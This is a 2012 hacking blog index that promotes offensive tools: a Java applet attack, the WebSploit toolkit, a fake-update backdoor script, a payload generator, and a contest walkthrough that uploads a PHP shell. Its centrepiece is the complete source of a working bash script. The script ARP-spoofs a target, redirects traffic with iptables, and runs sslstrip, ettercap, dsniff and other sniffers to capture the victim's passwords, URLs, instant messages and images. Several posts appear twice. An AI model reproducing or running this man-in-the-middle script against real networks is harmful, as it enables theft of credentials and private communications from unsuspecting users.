[Video]Advanced Remote Command Execute (3)
Download Video : http://www.mediafire.com/?zb3xa3ic3km9dn5
Watch Online : http://www.youtube.com/watch?v=E-sIhIqeXSA
Bl4ck.Viper
Security Researcher
Friday, March 16, 2012
Tuesday, March 13, 2012
WebSploit - Java Applet Attack
[Video]WebSploit Java Applet Attack
Donwload Websploit Version 1.4 : https://sourceforge.net/projects/websploit/files/WebSploit%20Toolkit%20V.1.4/
Online Video : http://www.youtube.com/watch?v=NXT2hv6Tcj8
Donwload Websploit Version 1.4 : https://sourceforge.net/projects/websploit/files/WebSploit%20Toolkit%20V.1.4/
Online Video : http://www.youtube.com/watch?v=NXT2hv6Tcj8
Wednesday, March 7, 2012
WebSploit Toolkit Version 1.2
WebSploit Is An Open Source Project For Scan And Analysis
Remote System From Vulnerability Description : [+]Autopwn - Used From Metasploit For Scan and Exploit Target Service [+]wmap - Scan,Crawler Target Used From Metasploit wmap plugin [+]format infector - inject reverse & bind payload into file format [+]phpmyadmin - Search Target phpmyadmin login page [+]lfi - Scan,Bypass local file inclusion Vulnerability &
can be bypass some WAF [+]apache users - search server username directory
(if use from apache webserver) [+]Dir Bruter - brute target directory with wordlist [+]admin finder - search admin & login page of target
-----------
Download : https://sourceforge.net/p/websploit/wiki/Home/
Sunday, February 19, 2012
Bypassing CWH - 2nd Hacking Contest
Cyber White Hat Contest Bypass Video
Step 1-2 = Bypass Redirect Page
Step 2 = Bypass & Exploit CSRF Vulnerability
Step 3 = Exploit PCI (PHP Code Injection) Vulnerability and Find Step4 Link Location
Step 4 = Bypass Image Uploader And Inject PHP Shell
Download Video : http://www.mediafire.com/?0cvu5c2i9hv12u6
Watch Online : http://www.youtube.com/watch?v=X2LGO2hANrw
Step 1-2 = Bypass Redirect Page
Step 2 = Bypass & Exploit CSRF Vulnerability
Step 3 = Exploit PCI (PHP Code Injection) Vulnerability and Find Step4 Link Location
Step 4 = Bypass Image Uploader And Inject PHP Shell
Download Video : http://www.mediafire.com/?0cvu5c2i9hv12u6
Watch Online : http://www.youtube.com/watch?v=X2LGO2hANrw
Tuesday, February 7, 2012
Viper FakeUpdate Script
[Video & Script]Viper FakeUpdate Script
Viper FakeUpdate Script Is a simple tools for create :
dnsspoof
arpspoof
create executable backdoor with metasploit
and show fakeupdate page in victim browser
Download Video : http://www.mediafire.com/?uu5eduswa0dilri
Download Script : http://www.mediafire.com/?6881ssc5vn8a39o
Watch Online : http://www.youtube.com/watch?v=-z6axDmpK1o
Viper FakeUpdate Script Is a simple tools for create :
dnsspoof
arpspoof
create executable backdoor with metasploit
and show fakeupdate page in victim browser
Download Video : http://www.mediafire.com/?uu5eduswa0dilri
Download Script : http://www.mediafire.com/?6881ssc5vn8a39o
Watch Online : http://www.youtube.com/watch?v=-z6axDmpK1o
Thursday, February 2, 2012
Viper Network Sniffer Script [vns.sh]
hi guys
this is a simple script to run all sniffer's on backtrack linux, and sniff victim
description :
sniff all text of messengers
sniff victim url's
sniff victim password [ettercap,dsniff]
sniff HTTP/SSL with sslstrip
....
Screenshot : http://s1.picofile.com/file/7278200000/vns.png
this is a simple script to run all sniffer's on backtrack linux, and sniff victim
description :
sniff all text of messengers
sniff victim url's
sniff victim password [ettercap,dsniff]
sniff HTTP/SSL with sslstrip
....
#!/bin/bash #(C)opyright ~ 2012 Bl4ck.Viper #www.bl4ck-viper.blogspot.com ~ Bl4ck.viper@Gmail.com #TBH Security Center # #Licence For BackTrack 5 #With this script you can Sniff your network very easy #sniffers: # urlsnarf => sniff target URL's # Driftnet => Sniff target Images # Dsniff => sniff target passwords # msgsnarf => sniff target IM [messengers] # Ettercap => sniff target passwords # SSLStrip => sniff HTTP/SSL # #--------------# scriptname=$0 targetip=$1 #--------------# # Settings "you can change this" export v_interface="eth0" # interface name export v_getway="192.168.1.1" # getway IP address #--------------# export v_version="Version 1.0.1" # current version export xterm="xterm" #--------------# function v_start(){ # Port Forwarding echo -e '\E[32m'"[+]Viper Network Sniffer Script"; tput sgr0 echo -e '\E[32m'"[+]Coded By Bl4ck.Viper"; tput sgr0 echo -e '\E[32m'"[+]TBH Security Center"; tput sgr0 sleep 2 echo -e '\E[32m'"[+]Setting Up ..."; tput sgr0 $xterm -geometry 75x10+10+0 -T "[VNS] v.$v_version - Terminating Other Arpspoof Process" -e "killall arpspoof" & #kill all the arpspoof sleep 2 $xterm -geometry 75x10+10+0 -T "[VNS] v.$v_version - Port Forwarding" -e "echo 1 > /proc/sys/net/ipv4/ip_forward" & #Ip Forwarding sleep 2 $xterm -geometry 75x10+10+0 -T "[VNS] v.$v_version - Port Forwarding" -e "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000" & #setting up iptable echo -e '\E[32m'"[+]OK"; tput sgr0 # Starting Sniffers ... echo -e '\E[33m'"[+]Starting MITM Attack"; tput sgr0 sleep 1 # step 1 : start MITM attack ... $xterm -geometry 75x8+10+120 -T "[VNS] v.$v_version - Starting The MITM Attack..." -e "arpspoof -i $v_interface -t $targetip $v_getway" & #Start the MITM sleep 3 echo -e '\E[33m'"[+]Starting Sinffers ..."; tput sgr0 $xterm -geometry 75x10+10+10 -T "[VNS] v.$v_version - Sniffing HTTP/SSL" -e "python /pentest/web/sslstrip/sslstrip.py -a -k -f" & # Sniff HTTP/SSL echo -e '\E[32m'"[+]SSLStrip Started."; tput sgr0 sleep 2 $xterm -geometry 75x10+10+10 -T "[VNS] v.$v_version - Sniffing Passwords [ettercap]" -e "ettercap -T -q -i $v_interface" & # Sniff target passwords sleep 2 echo -e '\E[32m'"[+]Ettercap Started."; tput sgr0 echo -e '\E[32m'"[+]Starting All Sniffers ..."; tput sgr0 sleep 1 $xterm -geometry 75x10+10+0 -T "[VNS] v.$v_version - Sniffing URL's ..." -e "urlsnarf -i $v_interface" & # Sniff target URL's sleep 1 $xterm -geometry 75x10+10+155 -T "[VNS] v.$v_version - Sniffing Passwords [1] ..." -e "dsniff -i $v_interface" & # Sniff target passwords sleep 1 $xterm -geometry 75x10+10+310 -T "[VNS] v.$v_version - Sniffing IM ..." -e "msgsnarf -i $v_interface" & # Sniff Target Messengers sleep 1 $xterm -geometry 75x10+10+465 -T "[VNS] v.$v_version - Sniffing Images ..." -e "driftnet -i $v_interface" & # Sniff target Images sleep 1 echo -e '\E[35m'"[+]All Sniffers Started ..."; tput sgr0 } function v_help() { clear echo -e '\E[32m'"[>] Welcome To Viper Network Sniffer"; tput sgr0 echo -e '\E[32m'"[>] Coded By Bl4ck.Viper"; tput sgr0 echo -e '\E[32m'"[>] TBH Security Center"; tput sgr0 echo "" echo -e '\E[32m'"[>] Usage : ./vns.sh [TargetIP]"; tput sgr0 echo -e '\E[35m'"[>] Notic : Set Your Network Information In Source Code (Setting Section)"; tput sgr0 } if [ "$targetip" ]; then v_start; else v_help; fi #Coded By Bl4ck.Viper #TBH Security Center
Screenshot : http://s1.picofile.com/file/7278200000/vns.png
Thursday, January 26, 2012
Kraken ShellCode, PHP & Executable Payload Generator
Kraken ShellCode, PHP & Executable Payload Generator
Working Metasploit
Licence For BackTrack 5
Download Video (Direct Link) : http://www.mediafire.com/?08ld804ge1e7eqk
Download Kraken Script : http://www.mediafire.com/?0qvx8tzmwyqv3rv
Watch Online : http://www.youtube.com/watch?v=eRJisBm8Ofk
Working Metasploit
Licence For BackTrack 5
Download Video (Direct Link) : http://www.mediafire.com/?08ld804ge1e7eqk
Download Kraken Script : http://www.mediafire.com/?0qvx8tzmwyqv3rv
Watch Online : http://www.youtube.com/watch?v=eRJisBm8Ofk
Subscribe to:
Posts (Atom)